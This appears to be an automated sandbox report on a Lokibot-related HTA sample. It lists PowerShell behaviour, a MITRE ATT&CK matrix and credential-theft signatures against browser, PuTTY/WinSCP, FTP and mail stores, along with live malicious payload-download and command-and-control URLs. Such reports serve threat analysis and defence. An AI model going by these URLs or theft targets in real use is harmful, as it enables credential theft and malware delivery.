Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		11_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		11_2_0040D069

Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Exploitation for Client Execution	111 Scripting	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials in Registry	14 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	4 PowerShell	Logon Script (Windows)	211 Process Injection	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	11 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	21 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kissmegoodthingwhichgivemebestthignswithgirluaremy.hta	21%	ReversingLabs	Script-JS.Trojan.Acsogenixx

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\188E93\31437F.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://192.3.243.136/32/seemybes	0%	Avira URL Cloud	safe
http://crl.microG	0%	Avira URL Cloud	safe
http://94.156.177.95/simple/five/fre.php	100%	Avira URL Cloud	malware
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT	0%	Avira URL Cloud	safe
http://192.3.243.136/	0%	Avira URL Cloud	safe
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF	100%	Avira URL Cloud	malware
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFon	0%	Avira URL Cloud	safe
http://192.3.243.136/cate	0%	Avira URL Cloud	safe
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFility	0%	Avira URL Cloud	safe
94.156.177.95/simple/five/fre.php	100%	Avira URL Cloud	malware
http://192.3.243.136/32/seemybestthingswithentirelifetimU&	0%	Avira URL Cloud	safe
http://192.3.243.136/32/SMPLLS.txt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip.1017.filemail.com	142.215.209.78	true	false		high
1017.filemail.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
94.156.177.95/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.95/simple/five/fre.php	true	Avira URL Cloud: malware	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f	false		high
http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF	true	Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://192.3.243.136/32/SMPLLS.txt	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://192.3.243.136/	powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S	powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmp	false		high
